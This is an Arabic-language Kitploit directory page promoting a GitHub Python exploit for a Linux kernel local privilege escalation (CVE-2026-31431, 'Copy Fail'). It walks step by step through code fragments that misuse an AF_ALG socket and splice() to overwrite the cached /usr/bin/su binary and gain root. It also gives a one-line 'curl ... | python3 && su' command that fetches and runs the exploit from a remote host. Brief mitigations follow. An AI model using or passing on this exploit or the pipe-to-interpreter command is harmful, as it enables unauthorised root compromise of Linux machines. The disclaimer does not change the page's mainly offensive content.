Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-31431 — استغلال بلغة بايثون لتصعيد الامتيازات محليًا في نواة لينكس (CVE-2026-31431) باستخدام حالة مقبس AF_ALG المربكة ودالة splice() لتحقيق كتابة عشوائية في الملفات والوصول إلى صلاحيات الجذر. | Kitploit
أدوات/GitHubGitHub/abhishekhargan/cve-2026-31431
تصعيد الامتيازاتأطر الاستغلالتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليماستغلال الملفات الثنائية
GitHubabhishekhargan/cve-2026-31431

CVE-2026-31431

استغلال بلغة بايثون لتصعيد الامتيازات محليًا في نواة لينكس (CVE-2026-31431) باستخدام حالة مقبس AF_ALG المربكة ودالة splice() لتحقيق كتابة عشوائية في الملفات والوصول إلى صلاحيات الجذر.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

CVE-2026-31431: "Copy Fail" - تصعيد الامتيازات المحلي في نواة لينكس

📢 إخلاء مسؤولية

هذا المستودع مخصص لأغراض تعليمية وبحوث الأمن السيبراني فقط. يتم تحليل كود الاستغلال لفهم الثغرة الأساسية، وتسهيل التصحيح، وتطوير استراتيجيات دفاعية. لا تستخدم هذا ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.

📝 نظرة عامة

"Copy Fail" هي ثغرة حرجة لتصعيد الامتيازات المحلي (LPE) تم اكتشافها في نواة لينكس. تسمح لمستخدم غير مميز بالحصول على وصول root من خلال استغلال خلل في كيفية تعامل النواة مع عمليات الذاكرة بين نظام الملفات وواجهة برمجة التشفير غير المتزامن (AF_ALG).

⚙️ كيف تعمل (غوص تقني عميق)

يستغل كود Python المقدم مجموعة من استدعاءات النظام وواجهات لينكس الغامضة لتحقيق كتابة خارج الحدود (OOB) عشوائية في ذاكرة النواة، والتي تُترجم بعد ذلك إلى كتابة ملفات عشوائية على القرص.

فيما يلي تفصيل خطوة بخطوة لسلسلة الهجوم:

1. تهيئة واجهة AF_ALG

root@kitploit:~
a=s.socket(38, 5, 0)
a.bind(("aead","authesn(hmac(sha256),cbc(aes))"))

يقوم السكربت بإنشاء مقبس AF_ALG (العائلة 38). تسمح هذه الواجهة لتطبيقات مساحة المستخدم بتفريغ العمليات التشفيرية إلى النواة. يطلب تحديدًا سلسلة تشفير AEAD (تشفير مصادق عليه مع بيانات مرتبطة) تجمع بين HMAC-SHA256 وCBC-AES.

2. إرباك الحالة عبر setsockopt

root@kitploit:~
v(h,1,d('0800010000000010'+'0'*64))
v(h,5,None,4)

يتلاعب السكربت بالحالة الداخلية للمقبس باستخدام setsockopt. تم تصميم الحمولة السداسية العشرية ووسيطة None بعناية لتحفيز حالة حدية أو تجاوز عدد صحيح في إدارة مخزن واجهة التشفير في النواة. هذا "يفشل" عملية النسخ بأمان داخل النواة، تاركًا المقبس في حالة غير متناسقة وقابلة للاستغلال.

3. نقل البيانات بنسخ صفري مع splice()

root@kitploit:~
n=g.splice; n(f,w,o,offset_src=0); n(r,u.fileno(),o)

هذا هو جوهر الاستغلال. بدلاً من قراءة البيانات إلى مساحة المستخدم وإعادتها، ينقل splice() البيانات مباشرة بين واصفات الملفات بالكامل داخل مساحة النواة. يفتح السكربت /usr/bin/su (ملف ثنائي SUID بصلاحيات root) ويحاول نقل البيانات منه إلى مقبس AF_ALG المضبوط بشكل خاطئ. نظرًا لأن حالة المقبس تم إفسادها في الخطوة 2، يفشل فحص الحدود في النواة أثناء عملية النسخ الصفري هذه.

4. حلقة حقن الحمولة

root@kitploit:~
e=zlib.decompress(d("78da..."))
while i<len(e):c(f,i,e[i:i+4]);i+=4

يفك السكربت ضغط حمولة مضغوطة (على الأرجح شيفرة صغيرة أو كتلة ثنائية معدلة). يدخل في حلقة، ويرسل هذه الحمولة 4 بايتات في كل مرة إلى مخزن المقبس التالف. بسبب فشل فحص الحدود، تصل هذه الكتابات ذات الـ 4 بايتات إلى إزاحات عشوائية في ذاكرة التخزين المؤقت للصفحات في النواة—وهي مساحة الذاكرة المحددة التي يتم تحميل /usr/bin/su فيها.

5. تصعيد الامتيازات

root@kitploit:~
g.system("su")

من خلال الكتابة فوق مؤشرات تعليمات محددة أو فحوصات منطقية داخل النسخة المخزنة مؤقتًا في الصفحات من /usr/bin/su، يعدل المهاجم سلوك الملف الثنائي. عند استدعاء system("su")، يتم تنفيذ الملف الثنائي SUID المعدل. يعمل الملف الثنائي كـ root لكنه يتخطى التحقق القياسي من كلمة المرور، مما يُسقط المهاجم مباشرة في قشرة root.

6. الاستغلال

قم بالتنزيل وتشغيل copyfail.py على نظام لينكس الخاص بك أو استخدم طلب curl أدناه للتشغيل السريع

root@kitploit:~
curl https://copy.fail/exp | python3 && su
id

https://github.com/user-attachments/assets/1f6c9365-710e-4241-889f-cb30af6d6f2e

🎯 التأثير

  • الخطورة: حرجة
  • ناقل الهجوم: محلي (يتطلب التنفيذ على الجهاز المستهدف)
  • التأثير: وصول كامل بصلاحيات root، تجاوز جميع أذونات الملفات وملفات تعريف SELinux/AppArmor.

🛡️ التخفيف والدفاع

  1. تصحيح النواة: قم بتطبيق أحدث تصحيحات الأمان المقدمة من توزيعة لينكس الخاصة بك (Canonical، Red Hat، Debian، إلخ).
  2. تقييد AF_ALG: إذا لم يكن تفريغ التشفير مطلوبًا لأحمال العمل الخاصة بك، قم بتعطيل وحدة النواة af_alg بإضافة blacklist af_alg إلى /etc/modprobe.d/blacklist.conf.
  3. ملفات تعريف Seccomp/AppArmor: قم بتقييد قدرة المستخدمين غير المميزين على استخدام splice() وsocket() (خاصة العائلة 38) وsetsockopt() باستخدام مرشحات Seccomp صارمة.

📚 المراجع

  • https://xint.io/blog/copy-fail-linux-distributions#the-exploit-4
تنزيل الأداة